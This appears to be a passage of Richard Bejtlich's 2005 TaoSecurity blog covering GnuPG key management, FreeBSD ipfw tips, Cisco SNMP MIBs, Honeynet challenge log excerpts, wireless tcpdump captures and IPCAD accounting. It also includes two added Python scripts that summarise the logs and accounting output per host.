gpg: please see http://www.gnupg.org/faq.html for more information
/home/richard/.gnupg/pubring.gpg
--------------------------------
pub 1024D/752B57C7 2005-04-23
Key fingerprint = 2B43 9A2E 6925 D581 5E34 FD6B 020C E655 752B 57C7
uid Richard Bejtlich richard_at_taosecurity_dot_com
sub 2048g/8BA44991 2005-04-23

To make my public key available in ASCII form, I exported it to a file.

orr:/home/richard$ gpg --export --armor richard_at_taosecurity_dot_com > richard_at_taosecurity_dot_com.key.gpg.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

You can access my public key here.

Now I wanted to create a revocation certificate, so that I can revoke my public key on the keyservers should my private key ever be compromised or lost. (Keyservers never delete a key; uploading the certificate marks the key as revoked.)

orr:/home/richard$ gpg --gen-revoke richard_at_taosecurity_dot_com > richard_at_taosecurity_dot_com.revoke.gpg.asc
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information

sec 1024D/752B57C7 2005-04-23 Richard Bejtlich richard_at_taosecurity_dot_com

Create a revocation certificate for this key? (y/N) y
Please select the reason for the revocation:
0 = No reason specified
1 = Key has been compromised
2 = Key is superseded
3 = Key is no longer used
Q = Cancel
(Probably you want to select 1 here)
Your decision? 0
Enter an optional description; end it with an empty line:
Revoke

Reason for revocation: No reason specified
Revoke
Is this okay? (y/N) y

You need a passphrase to unlock the secret key for
user: "Richard Bejtlich richard_at_taosecurity_dot_com"
1024-bit DSA key, ID 752B57C7, created 2005-04-23

Enter passphrase:

ASCII armored output forced.
Revocation certificate created.

Please move it to a medium which you can hide away; if Mallory gets
access to this certificate he can use it to make your key unusable.
It is smart to print this certificate and store it away, just in case
your media become unreadable. But have some caution: The print system of
your machine might store the data and make it available to others!
orr:/home/richard$ chmod 400 richard_at_taosecurity_dot_com.revoke.gpg.asc

Finally, I wanted to make this new public key available on public keyservers. I have to specify my public key ID 752B57C7, which is seen in the --list-keys output above and is also the last eight characters of my key fingerprint.

orr:/home/richard$ gpg --send-keys 752B57C7
gpg: WARNING: using insecure memory!
gpg: please see http://www.gnupg.org/faq.html for more information
gpg: sending key 752B57C7 to hkp server subkeys.pgp.net

I also submitted my public key to www.keyserver.net, which has a Web-accessible search form. By default GnuPG sent my key to subkeys.pgp.net. To search the pgp.net keyservers, visit www.pgp.net/pgpnet/wwwkeys.html.

If someone cares to send me a message encrypted with my public key, a future blog entry will show how to decrypt it.

Thursday, April 21, 2005

ZDNet BSD Certification Coverage and More

Joe Brockmeier published an interview with Dru Lavigne, chair of the BSD Certification Group. I'm a member of that organization and I will be present at the BSDCan 2005 BoFs to discuss BSD certification with any interested parties. Dru's interview provides additional background on our progress towards creating respected, valuable BSD certifications.

Most importantly, today our Task Analysis Survey is publicly available. This is a Web-based questionnaire that we hope BSD users like you will complete. Our goal is to learn what BSD users and administrators consider to be the essential administration tasks for BSD systems. Please help us out by completing the survey no later than midnight GMT 22 May 2005. Thank you!

Wednesday, April 20, 2005

Todd Lammle Teaches CCNA in Denver in June

You may have followed my recent journey towards passing the CCNA exam. My instructor Todd Lammle just told me he will be teaching another CCNA class in Denver, from 13 to 17 June. This is a rare event as Todd runs the training company GlobalNet Training and stays very busy.

Todd is the author of the best-selling CCNA: Cisco Certified Network Associate, Deluxe Edition (640-801), 4th Ed, which helped immensely. I highly recommend attending this class if you want to pass your CCNA. If you decide to go, please email me at taosecurity at gmail dot com. I would like to hear what you think of the class.

Cross-platform Pf Guide

While the official OpenBSD Pf guide is very good, I recommend those wishing to learn more about the Pf firewall check out Peter N. M. Hansteen's Firewalling with Pf guide. I like this document because it shows how to get Pf working on OpenBSD, FreeBSD, and NetBSD. Peter also covers the most common deployment scenarios and he addresses topics I consider important. Check it out if you're considering a Pf-based firewall solution.

FreeBSD News

I have some good FreeBSD news to report. FreeBSD 5.4-RC3 was announced Monday. Although the schedule still calls for a 26 April release date, I believe we will not see the RELEASE until the first week in May. According to the announcement:

"Due to one major issue that crops up on large (4-processor) systems under heavy load that is still being debugged there will be at least one more RC added to the schedule. Timing for the extra RC and the new Release date have not been set yet."

I am hoping that FreeBSD 5.4 will be the release that convinces 4.x users to upgrade. I have not had any problems running FreeBSD 5.3 since it arrived last November, but others are more cautious.

There's an interesting freebsd-stable thread with several hints on updating systems. This post by Aristedes Maniatis recommends using the following command to preserve access to a system when you accidentally lock yourself out while modifying firewall rules.

echo "ipfw add 1 pass all from any to any" at now +10 minutes

He continues with "Then if all goes OK, use atq to remove the queue item. If not, wait 10 minutes..."

That is great advice. I have heard of "people" locking themselves out of systems while modifying firewall rules.

David Talkington offered an alternative method to avoid lockout -- using IPFW's set 31 feature. From the manual:

set set_number
Each rule is associated with a set_number in the range 0..31.
Sets can be individually disabled and enabled, so this parameter
is of fundamental importance for atomic ruleset manipulation. It
can be also used to simplify deletion of groups of rules.
If a rule is entered without specifying a set number, set 0
will be used.
Set 31 is special in that it cannot be disabled, and rules in set
31 are not deleted by the ipfw flush command (but you can delete
them with the ipfw delete set 31 command). Set 31 is also used
for the default rule.

Here is how a normal IPFW rule (numbered 5000) is added, say to disable ICMP.

drury:/root# ipfw add 5000 deny icmp from any to any
05000 deny icmp from any to any
drury:/root# ipfw list
05000 deny icmp from any to any
65535 deny ip from any to any

If I flush the rules, only the default rule at the bottom remains:

drury:/root# ipfw flush
Are you sure? [yn] y

Flushed all rules.
drury:/root# ipfw list
65535 deny ip from any to any

Now I add a set 31 rule. The syntax would be something like this:

drury:/root# ipfw add 10000 set 31 allow ip from 192.168.1.0/24 to any
10000 allow ip from 192.168.1.0/24 to any
drury:/root# ipfw list
10000 allow ip from 192.168.1.0/24 to any
65535 deny ip from any to any

This adds rule number 10000 with set 31. It allows any traffic from a defined subnet. Now I flush the rules and check the results.

drury:/root# ipfw flush
Are you sure? [yn] y

Flushed all rules.
drury:/root# ipfw list
10000 allow ip from 192.168.1.0/24 to any
65535 deny ip from any to any

I can rid myself of the set 31 rule using this method.

drury:/root# ipfw delete 10000 disable 31
drury:/root# ipfw list
65535 deny ip from any to any

On a different subject, Jean Simon mentioned the nextboot utility to specify an alternate kernel after performing an upgrade.

Tuesday, April 19, 2005

TaoSecurity Visits the Pentagon

This morning I was pleased to speak at the Pentagon on behalf of the Network Security Services-Pentagon section of the US Army Information Technology Agency. (I would like to provide a URL, but there's no point linking to sites that return "403.6 Forbidden: IP address rejected" errors!) Doug Steelman, pictured with me in the photo below, invited me to discuss network security monitoring at their Pentagon Security Forum. Last month Erik Birkholz and Steve Andres from Special Ops Security spoke on assessments. Next month Kevin Mandia of Red Cliff Consulting will discuss incident response. Doug and his colleague Mark Orlando were kind enough to take me on a tour of the building and share some of their approaches to detecting intrusions on the Pentagon's networks.

While I will not outline specifics here, I will say I was impressed by the variety of network traffic the Pentagon collects. They are not a single-solution shop that can be beaten by evading one variety of intrusion detection system deployed at the perimeter. Rather, they gather alert, session, and statistical data and have the capability to collect some full content data. I will not name tools, but I was surprised by some of their choices. By this I mean they seemed genuinely interested in novel approaches to identifying and validating security events.

As far as the Pentagon network is concerned, they are literally an ISP in their own right. They have multiple Autonomous Systems (ASes) and they connect to the DISA backbone with 100 Mbps ATM links. After September 11th 2001 they decided to reengineer their network to be more disaster-resilient, and they are now deploying an MPLS-based routing design to facilitate this goal. I look forward to meeting and working with this team in the future, and I thank Doug and Mark for being great hosts today.

Monday, April 18, 2005

Researching Cisco Switch Backplane Statistics

While teaching at USENIX last week, I discussed SPAN ports. I mentioned that a switch treats copying traffic to the SPAN port as less important than moving packets through the switch. One of the students asked if measuring the utilization of the switch backplane would reveal how well the switch was performing the SPAN function. Another student said there was a Simple Network Management Protocol Management Information Base (SNMP MIB) from which backplane statistics could be retrieved. I decided to research this issue as it affects using switches to collect traffic for network security monitoring. (Incidentally, Talisker offers SPAN port configuration advice for all sorts of switches.)

One answer appears in the Cisco document How to Get Catalyst Switch Backplane Utilization Using SNMP. This sounds promising until we read "the information in this document is valid for Cisco Catalyst switches that run Catalyst code only." Since modern Cisco switches run IOS, we seem out of luck.

That document produced several leads. First, it mentioned the CISCO-STACK-MIB. Finding this MIB clued me in to the multitude of MIBs offered by Cisco. They are available via FTP from ftp://ftp.cisco.com/pub/mibs/.

The link to the CISCO-STACK-MIB brought me to the SNMP Object Navigator. This is a really helpful tool. You can search object names and descriptions to receive a list of matching objects and MIBs for terms like backplane.

Another excellent resource is the MIBs Supported by Product tool. For example, here are all of the MIBs supported by the Cisco 2950 switch.

Cisco offers a few other helpful sites. These include the Cisco IOS MIB Tools page. That site has a link labelled MIB Locator. Follow it, select your IOS release, platform family (device), and IOS feature set, and you will learn what MIBs are present. Also useful are SNMP: Frequently Asked Questions About MIBs and the IP Application Services page for SNMP.

Getting back to the original question -- the original Cat OS discussion of the CISCO-STACK-MIB mentioned the sysTraffic Object Name as a place to find backplane information. Specifically, the description reads "Traffic meter value, i.e. the percentage of bandwidth utilization for the previous polling interval." The question now is to find out what Cisco devices support providing this information via SNMP. The View Supporting Images link on the sysTraffic page shows the Cisco IOS images which offer this SNMP value.

According to the results, the Cisco 3550 appears to be the cheapest switch which provides backplane statistics. I guess I won't be able to test this on my 2950! If anyone else managed to try this out, perhaps using snmpwalk from Net-SNMP, please post a comment.

New Honeynet Project Challenge

I saw that the Honeynet Project announced a new Scan of the Month last week. The evidence consists of Apache logs, Linux syslogs, Snort logs, and IPTables firewall logs. Here are examples.

From the Apache access log:

210.116.59.164 - - [13/Mar/2005:04:05:47 -0500]
"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 1063 "-" "-"


From the /var/log/messages syslog:

Mar 13 22:50:53 combo sshd(pam_unix)[9356]:
authentication failure; logname= uid=0 euid=0
tty=NODEVssh ruser= rhost=h-67-103-15-70.nycmny83.covad.net user=root


From the Snort logs, apparently captured via syslog:

Feb 25 12:21:33 bastion snort: [1:483:5] ICMP PING CyberKit 2.2 Windows
[Classification: Misc activity] [Priority: 3]: {ICMP}
70.81.243.88 -> 11.11.79.100


Finally, from the IPTables logs:

Feb 25 12:11:24 bridge kernel: INBOUND TCP: IN=br0
PHYSIN=eth0 OUT=br0 PHYSOUT=eth1
SRC=220.228.136.38 DST=11.11.79.83 LEN=64 TOS=0x00
PREC=0x00 TTL=47 ID=17159 DF
PROTO=TCP SPT=1629 DPT=139 WINDOW=44620 RES=0x00 SYN URGP=0


Let's see how much data is in each of the logs. I used 'wc' to count lines in each of the sets of logs.

  • Apache: 7,620

  • Syslog: 3,925

  • Snort: 69,039

  • IPTables: 179,752

  • Total: 260,336


So, we have over 260,000 lines of log entries to review. This seems fairly crazy to me. As an NSM practitioner who advocates collecting session and full content data, I am often criticized by those who consider it too difficult or expensive to collect such forms of network evidence. This Scan of the Month presents the alternative -- working through line after line of text-based log entries. Now what is more expensive, in terms of time and resources?

You might say I would have the same problem analyzing this intrusion using NSM techniques. You might believe Snort would yield the same number of alerts whether configured to emit text-based records via syslog or alerts for presentation by Sguil.

I guarantee I could determine if the system was compromised, and by how many parties, faster using NSM techniques than manual log analysis.

I would also know exactly what network traffic the intruder launched against the target, regardless of whether or not it triggered a Snort alert. I would not have to look at text-based IPTables representations of packet movement. I could instead look at session data, which summarizes the thousands of packets in a flow into a single record.

I believe the winner of this SotM will end up being a Perl or Awk wizard who can parse the logs efficiently to reduce the number of lines to be analyzed.
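
To show what that reduction looks like in practice, here is an added example (my code, not part of the original post or of the Honeynet Project's challenge materials). Each of the four formats quoted above is parsed into a common (source, activity) record, and the records are then collapsed into per-source counts, which is the step that turns a quarter of a million lines into a short list of who did what. The log lines are constructed to match the formats shown above; they are not the real SotM evidence, and the helper names are my own.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines modelled on the four formats quoted above. They are
# not the real Scan of the Month evidence; the iptables lines vary the
# destination port and the sshd lines repeat, so the reduction has something
# to collapse.
APACHE_LINES = [
    '210.116.59.164 - - [13/Mar/2005:04:05:47 -0500] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 1063 "-" "-"',
    '10.0.0.5 - - [13/Mar/2005:04:06:01 -0500] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/4.0"',
]
SYSLOG_LINES = [
    'Mar 13 22:50:53 combo sshd(pam_unix)[9356]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=h-67-103-15-70.nycmny83.covad.net user=root',
    'Mar 13 22:51:10 combo sshd(pam_unix)[9360]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=h-67-103-15-70.nycmny83.covad.net user=root',
]
SNORT_LINES = [
    'Feb 25 12:21:33 bastion snort: [1:483:5] ICMP PING CyberKit 2.2 Windows [Classification: Misc activity] [Priority: 3]: {ICMP} 70.81.243.88 -> 11.11.79.100',
]
IPTABLES_LINES = [
    'Feb 25 12:11:24 bridge kernel: INBOUND TCP: IN=br0 PHYSIN=eth0 OUT=br0 PHYSOUT=eth1 SRC=220.228.136.38 DST=11.11.79.83 LEN=64 TOS=0x00 PREC=0x00 TTL=47 ID=17159 DF PROTO=TCP SPT=1629 DPT=139 WINDOW=44620 RES=0x00 SYN URGP=0',
    'Feb 25 12:11:25 bridge kernel: INBOUND TCP: IN=br0 PHYSIN=eth0 OUT=br0 PHYSOUT=eth1 SRC=220.228.136.38 DST=11.11.79.83 LEN=64 TOS=0x00 PREC=0x00 TTL=47 ID=17160 DF PROTO=TCP SPT=1630 DPT=445 WINDOW=44620 RES=0x00 SYN URGP=0',
]

# One pattern per format. The syslog-style formats share a timestamp prefix.
SYSLOG_TS = r'(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d)'
APACHE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                       r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
SSHD_RE = re.compile(SYSLOG_TS + r' \S+ sshd\(pam_unix\)\[\d+\]: authentication failure;'
                     r'.*?rhost=(?P<src>\S*).*?user=(?P<user>\S+)')
SNORT_RE = re.compile(SYSLOG_TS + r' \S+ snort: \[(?P<sid>[\d:]+)\] (?P<msg>.*?) '
                      r'\[Classification: [^\]]*\] \[Priority: \d+\]: \{(?P<proto>\w+)\} '
                      r'(?P<src>[\d.]+)(?::\d+)? -> (?P<dst>[\d.]+)(?::\d+)?')
IPTABLES_RE = re.compile(SYSLOG_TS + r' \S+ kernel: (?:(?P<tag>[A-Z ]+): )?(?P<fields>.*)$')


def parse_apache(line):
    m = APACHE_RE.match(line)
    if not m:
        return None
    return {"source": "apache", "ts": m["ts"], "src": m["src"],
            "summary": f'{m["method"]} {m["path"]} {m["status"]}'}


def parse_syslog(line):
    """Only the sshd/pam failure form shown above is handled; other syslog
    lines come back as None and are counted as unparsed."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    return {"source": "syslog", "ts": m["ts"], "src": m["src"] or "?",
            "summary": f'sshd auth failure user={m["user"]}'}


def parse_snort(line):
    m = SNORT_RE.match(line)
    if not m:
        return None
    return {"source": "snort", "ts": m["ts"], "src": m["src"],
            "summary": f'[{m["sid"]}] {m["msg"]} -> {m["dst"]}'}


def parse_iptables(line):
    m = IPTABLES_RE.match(line)
    if not m:
        return None
    # Netfilter logs are KEY=VALUE pairs; bare flags such as DF or SYN are skipped.
    kv = dict(re.findall(r'(\w+)=(\S*)', m["fields"]))
    if "SRC" not in kv or "DST" not in kv:
        return None
    target = f'{kv["DST"]}:{kv["DPT"]}' if kv.get("DPT") else kv["DST"]
    return {"source": "iptables", "ts": m["ts"], "src": kv["SRC"],
            "summary": f'{(m["tag"] or "").strip()} -> {target}'}


def parse_logs(apache=(), syslog=(), snort=(), iptables=()):
    """Run every line through the parser for its log type. Returns the
    records plus a count of lines no parser understood, so silently dropped
    evidence shows up as a number rather than vanishing."""
    records, unparsed = [], 0
    for parser, lines in ((parse_apache, apache), (parse_syslog, syslog),
                          (parse_snort, snort), (parse_iptables, iptables)):
        for line in lines:
            rec = parser(line)
            if rec is None:
                unparsed += 1
            else:
                records.append(rec)
    return records, unparsed


def reduce_by_source(records):
    """Collapse records into {src: Counter(summary)}: distinct activity per
    source with a count, instead of one line per packet or alert."""
    table = defaultdict(Counter)
    for r in records:
        table[r["src"]][r["summary"]] += 1
    return dict(table)


def busiest_sources(records, n=5):
    return Counter(r["src"] for r in records).most_common(n)


if __name__ == "__main__":
    recs, bad = parse_logs(APACHE_LINES, SYSLOG_LINES, SNORT_LINES, IPTABLES_LINES)
    for src, acts in reduce_by_source(recs).items():
        for act, count in acts.items():
            print(f"{count:6d}  {src:35s}  {act}")
    print(f"unparsed lines: {bad}")
```

Real evidence files would be read with `open()` and fed to `parse_logs` line by line; the table `reduce_by_source` returns is what you would then sort and read, and the `unparsed` count tells you how much of the evidence your patterns did not cover.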

This is still a useful challenge. If there is any data available at all after a compromise, it is often in the form of Web logs, syslogs, and so on. It is important to know how to interpret such evidence, if that is all there is to analyze. Still -- imagine the possibilities when NSM-based evidence is collected!

Friday, April 15, 2005

Speaking at Net Optics Think Tank Event in May

I will be presenting my thoughts on pervasive network awareness as facilitated by taps at the next Net Optics Think Tank. The event will take place on 18 May 2005 in their Sunnyvale, CA headquarters. I use Net Optics taps to gain access to traffic when performing network security monitoring.

Thursday, April 14, 2005

Red Cliff Article on Web Browser Forensics

I just learned of a new article, Web Browser Forensics, Part 1 by Keith J. Jones and Rohyt Belani of Red Cliff Consulting. This is part one of two articles, and it features a variety of methods to learn about a user's Web browsing history. Any time digital forensics appears in the news, it is often based on discovering a person's Web browsing activities. The Chandra Levy case is the canonical example.

Wireless Traffic Snippets

In my USENIX talk I show how to collect wireless traffic using Tcpdump. In my slides I use a verbose method that only shows a few packets. In the following I'd like to show a variety of traffic available using Tcpdump.

First I tell my wireless card to go into monitor mode and watch channel 1. Then I ask Tcpdump to show me the media types it understands.

orr:/root# ifconfig wi0 mediaopt monitor channel 1 up
orr:/root# tcpdump -i wi0 -L
Data link types (use option -y to set):
EN10MB (Ethernet)
IEEE802_11 (802.11)
IEEE802_11_RADIO (802.11 plus BSD radio information header)

Now that I see the media types, I select the second option and begin capturing traffic.

orr:/root# tcpdump -n -i wi0 -y IEEE802_11
tcpdump: data link type IEEE802_11
tcpdump: WARNING: wi0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wi0, link-type IEEE802_11 (802.11), capture size 96 bytes

First we see a beacon with the conference wireless access point SSID. Next is one of many clear-to-send packets.

00:21:19.586724 Beacon (usenix) [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] ESS CH: 1
00:21:19.587160 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

Here are more CTSs and a NetBIOS port 137 UDP query.

00:21:19.915245 Clear-To-Send RA:00:0d:54:9c:5c:0b
00:21:19.926293 IP 131.106.56.95.137 > 172.30.0.255.137: NBT UDP PACKET(137):
QUERY; REQUEST; BROADCAST
00:21:19.938333 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

We see our first 802.11 acknowledgement.

00:21:20.273184 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:20.277588 Acknowledgment RA:00:90:4b:ae:8e:43
00:21:20.279822 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

Here's our first request to send.

00:21:20.710353 Clear-To-Send RA:00:0d:54:9c:5c:0b
00:21:20.711677 Request-To-Send TA:00:0d:54:9c:5c:0b
00:21:20.712081 Clear-To-Send RA:00:0d:54:9c:5c:0b
...truncated...

I don't know what the LLC packet means, but it's quickly followed by a probe request and response.

00:21:20.858267 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:20.859258 [|llc](LLC 000d)
00:21:20.859604 Acknowledgment RA:00:0d:54:9c:5c:0b
00:21:20.860719 Probe Request () [1.0 2.0 5.5 11.0 Mbit]
00:21:20.862199 Probe Response (usenix) [1.0* 2.0 5.5 6.0 9.0 11.0 12.0 18.0 Mbit] CH: 1
00:21:20.862469 Acknowledgment RA:00:0f:34:42:b7:20
00:21:20.863118 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

We don't only see broadcast traffic. Here are a couple of TCP packets:

00:21:26.612946 Clear-To-Send RA:00:0d:93:ec:5f:ba
00:21:26.619326 IP 216.239.57.105.80 > 131.106.58.64.1614:
F 126736513:126736513(0) ack 2074693501 win 8190
00:21:26.620840 IP 216.239.57.105.80 > 131.106.58.64.1614:
F 0:0(0) ack 1 win 8190
...truncated...

Here's an ARP request.

00:21:30.564116 Clear-To-Send RA:00:0f:34:42:b7:20
00:21:30.566783 arp who-has 131.106.56.11 tell 131.106.56.32
00:21:30.567184 Clear-To-Send RA:00:0f:34:42:b7:20
...truncated...

Last, here's a DHCP request.

00:21:32.238510 Clear-To-Send RA:00:90:96:a6:6a:70
00:21:32.252827 IP 131.106.56.64.68 > 255.255.255.255.67:
BOOTP/DHCP, Request from 00:90:96:ab:c6:10, length: 300
00:21:32.254038 Acknowledgment RA:00:90:4b:ae:8e:43
00:21:32.275796 Clear-To-Send RA:00:0f:34:42:b7:20

That was the IEEE802_11 media option. Unfortunately, the IEEE802_11_RADIO option does not seem to produce anything useful.

orr:/root# tcpdump -n -i wi0 -y IEEE802_11_RADIO
tcpdump: data link type IEEE802_11_RADIO
tcpdump: WARNING: wi0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wi0, link-type IEEE802_11_RADIO
(802.11 plus BSD radio information header), capture size 96 bytes
00:26:12.788071 [|802.11]
00:26:12.788915 [|802.11]
00:26:12.789331 [|802.11]
...truncated...

This is nothing special, but it does show what you can capture using Tcpdump while not being associated with a wireless network.

Wednesday, April 13, 2005

Notes on IPCAD

Tomorrow morning I teach Network Security Monitoring with Open Source Tools at USENIX 05. I've been taking another look at the tools I will be presenting tomorrow to ensure I'm up-to-date on their latest versions and features.

One of the tools I talk about is IPCAD, the IP Cisco Accounting Daemon by Lev Walkin. I discuss IPCAD in the section on statistical data for network security monitoring (NSM) in my book and my talk. I like IPCAD because it presents data just like one sees with the Cisco show ip accounting command. I actually used IPCAD in an incident response scenario several years ago, before I learned of Carter Bullard's Argus.

The version available in the FreeBSD ports tree (net-mgmt/ipcad) requires more entries in the ipcad.conf file than what I present in my book and slides. Here is the ipcad.conf file I created after I installed IPCAD using the FreeBSD port.

capture-ports disable;
interface wi0;
rsh enable at 127.0.0.1;
rsh root@127.0.0.1 admin;
dumpfile = ipcad.dump;
chroot = /var/ipcad;
memory_limit = 1m;

Before starting IPCAD, I created the directory /var/ipcad to hold the ipcad.dump file. Here's how I started IPCAD.

orr:/root# ipcad -drs
Opening wi0... [LCap] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
Can't open dump file ipcad.dump
Daemonized.

The -drs meant "daemonize," "import saved accounting table on startup," and "save the active accounting table on exit," respectively. Starting IPCAD opened an rsh server on my loopback address.

orr:/home/richard$ sockstat -4
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
root ipcad 736 3 tcp4 127.0.0.1:514 *:*
root dhclient 551 5 udp4 *:68 *:*
root sendmail 397 4 tcp4 127.0.0.1:25 *:*
root sshd 391 4 tcp4 *:22 *:*

Once IPCAD was running, I could query it as shown next. I ignore the "Connection refused" error caused by running an IPv6-enabled TCP/IP stack but not offering the rsh server in an IPv6-enabled manner.

orr:/root# rsh localhost stat
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 833, 5 m average 773 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 32
Memory usage: 0% (2816 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 17 minutes

We can also check the status of our interface. This should look familiar to Cisco fans.

orr:/root# rsh localhost show interface wi0
connect to address ::1: Connection refused
Trying 127.0.0.1...
wi0 is up, line protocol is up
Hardware is Ethernet, address is 0004.e229.3bba
Internet address is 131.106.57.173 255.255.248.0
IP broadcast address is 131.106.63.255
Encapsulation Ethernet, loopback not set
MTU 1500 bytes, BW 11000 Kbit
Input queue: 0 drops
Last administrative status change at Thu Apr 14 02:58:55 2005
5 minute average rate 4208 bits/sec, 1 packets/sec
1914 packets input, 775739 bytes, 0 no buffer
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
704 packets output, 144852 bytes, 0 underruns
0 output errors, 45 collisions, 0 interface resets, 0 restarts

Next I ask IPCAD to display Cisco accounting data.

orr:/root# rsh localhost show ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...

Source Destination Packets Bytes
131.106.57.229 255.255.255.255 2 656
192.168.75.1 255.255.255.255 1 60
131.106.57.79 131.106.63.255 6 468
131.106.57.229 239.255.255.250 3 483
131.106.57.229 224.0.0.22 2 80
131.106.57.229 131.106.63.255 39 5237
216.218.215.226 131.106.57.173 6 3329
131.106.57.173 216.218.215.226 8 1147
66.35.250.209 131.106.57.173 16 2255
131.106.57.173 66.35.250.209 15 2039
...edited...
131.106.57.83 224.0.0.251 1 32
0.0.0.0 224.0.0.1 3 84
131.106.56.1 255.255.255.255 1 328
0.0.0.0 255.255.255.255 15 4920

Accounting data age is 2
Accounting data age exact 163
Accounting data saved 1113448566
Interface wi0: received 874, 5 m average 726 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 34
Memory usage: 0% (2992 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 18 minutes

This is very useful data. You can periodically dump these records, and then grep them to see the level of activity of hosts of interest.

You can collect more granular data by changing one line of the ipcad.conf file:

capture-ports enable;

As the ipcad.conf man page states:

capture-ports { enable | disable };

Make ipcad account for UDP/TCP ports, IP protocol and ICMP types on
a per-interface basis. This setting is relevant for RSH and inter-
active export methods only. Capturing UDP and TCP is disabled by
default to maintain historic RSH output format compatibility. To
selectively enable capturing ports on certain interfaces, specify
the capture-ports between the appropriate interface configuration
statements.

After making the change, I stop and start IPCAD.

orr:/root# rsh localhost shutdown
connect to address ::1: Connection refused
Trying 127.0.0.1...
Shutdown process started
orr:/root# ipcad -drs
Opening wi0... [LCap] [ERSH] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
No valid entries found in ipcad.dump.
Daemonized.

I clear the accounting database for good measure, pause, and then check some records.

orr:/root# rsh localhost clear ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...
IP accounting cleared
orr:/root# rsh localhost show ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...

Source Destination Packets Bytes SrcPt DstPt Proto IF
207.171.166.48 131.106.57.173 60 82444 80 53255 6 wi0
131.106.57.173 207.171.166.48 37 2102 53255 80 6 wi0
207.171.166.48 131.106.57.173 10 1145 80 57108 6 wi0
131.106.57.173 207.171.166.48 8 1547 57108 80 6 wi0
131.106.56.1 131.106.57.173 1 220 53 59064 17 wi0
131.106.57.173 131.106.56.1 1 60 59064 53 17 wi0
131.106.56.1 131.106.57.173 1 60 53 51547 17 wi0
...edited...
131.106.58.189 224.0.0.251 3 2240 5353 5353 17 wi0
131.106.58.191 131.106.63.255 2 156 49407 137 17 wi0

Interface wi0: received 560, 5 m average 485 bytes/sec, 0 pkts/sec, dropped 0
Flow entries made: 19
Memory usage: 0% (1672 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 46 minutes

We have gotten closer to the realm of NSM session data here. While we have socket information (source IP, source port, destination IP, destination port), we do not have timestamps. I prefer to leave the port information out of the equation and just keep the IP and byte counts.
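As an added example (not code from the original post or from the IPCAD project), the script below parses both accounting layouts shown above, the default Source/Destination/Packets/Bytes table and the capture-ports table with SrcPt/DstPt/Proto/IF columns, discards the port columns and totals bytes per IP, so a periodic dump can be summarised per host instead of grepped row by row. The embedded sample is constructed from rows of the output above.

```python
"""Summarise IPCAD 'show ip accounting' output per host (added example)."""
import re
from collections import defaultdict

# Constructed sample mimicking 'rsh localhost show ip accounting' with
# capture-ports enabled; rows are taken from the dump shown in the post.
SAMPLE = """\
connect to address ::1: Connection refused
Trying 127.0.0.1...

Source Destination Packets Bytes SrcPt DstPt Proto IF
207.171.166.48 131.106.57.173 60 82444 80 53255 6 wi0
131.106.57.173 207.171.166.48 37 2102 53255 80 6 wi0
131.106.56.1 131.106.57.173 1 220 53 59064 17 wi0
...edited...
131.106.58.189 224.0.0.251 3 2240 5353 5353 17 wi0

Interface wi0: received 560, 5 m average 485 bytes/sec, 0 pkts/sec, dropped 0
Flow entries made: 19
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def parse_accounting(text):
    """Yield (src, dst, packets, bytes) per data row; port columns, if any, are ignored."""
    columns = None
    for line in text.splitlines():
        fields = line.split()
        if fields[:2] == ["Source", "Destination"]:
            columns = fields  # header line tells us which layout we have
            continue
        if columns is None or len(fields) < 4 or not IPV4.match(fields[0]):
            continue  # banner, blank, "...edited..." and trailing status lines
        pkts = int(fields[columns.index("Packets")])
        octets = int(fields[columns.index("Bytes")])
        yield fields[0], fields[1], pkts, octets

def bytes_per_host(text):
    """Total bytes observed with each IP as source or destination."""
    totals = defaultdict(int)
    for src, dst, _pkts, octets in parse_accounting(text):
        totals[src] += octets
        totals[dst] += octets
    return dict(totals)

def top_talkers(text, n=3):
    """Hosts ranked by total bytes, highest first (ties broken by address)."""
    ranked = sorted(bytes_per_host(text).items(), key=lambda kv: (-kv[1], kv[0]))
    return ranked[:n]
```

To use it on a saved dump, call top_talkers(open("dump.txt").read()) and compare the ranked list against the hosts you care about.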

There is one final aspect of IPCAD that deserves mention. In my book I mention Fprobe and ng_netflow as software-based NetFlow collectors. It turns out that IPCAD has the same functionality. IPCAD can act as a probe and send NetFlow records to a collector like Flow-capture in the Flow-tools collection.

